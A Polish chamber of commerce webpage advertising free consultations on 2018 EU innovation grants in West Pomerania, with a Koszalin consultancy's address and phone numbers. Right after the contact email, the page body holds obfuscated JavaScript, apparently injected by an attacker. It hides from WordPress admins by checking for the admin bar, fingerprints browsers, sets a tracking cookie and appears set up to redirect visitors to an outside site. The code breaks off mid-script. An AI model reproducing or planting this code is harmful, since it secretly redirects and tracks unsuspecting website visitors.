Bezpłatne Konsultacje Dla Firm ws dotacji | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-Zaprasza-Bezplatne-Konsultacje-Unijne-dla-Firm

 

DOTACJA W INNOWACJE NA 2018 ROK

02 lipca 2018  r. Zarząd Województwa Zachodniopomorskiego jako Instytucja Zarządzająca Regionalnym Programem Operacyjnym 2014-2020 przyjął aktualizację  Harmonogram konkursów dla Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2014-2020 na rok 2018.

W związku z powyższym pojawiają się nowe możliwości na otrzymanie dofinansowania unijnego dla firm, również z Naszego regionu.

Dlatego też serdecznie zapraszam wszystkich chętnych i zainteresowanych na BEZPŁATNE konsultacje.

Inwestycje związane z wdrożeniem innowacyjnych rozwiązań w firmie (technologicznych oraz produktowych) poprzez:

– zakup nieruchomości

– zaprojektowanie i wykonanie prac budowlanych

– zakup środków trwałych

– zakup wartości niematerialnym i prawnych.

 

Na konsultacje proszę umawiać się:

Od poniedziałku do piątku w godzinach 9 – 16

PRIOR CONSULTING SP. Z O.O.

Wojska Polskiego 24-26

75-712 Koszalin

tel. 518 975 511

tel. 94 717 36 48

e-mail: biuro@priorconsulting.pl 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m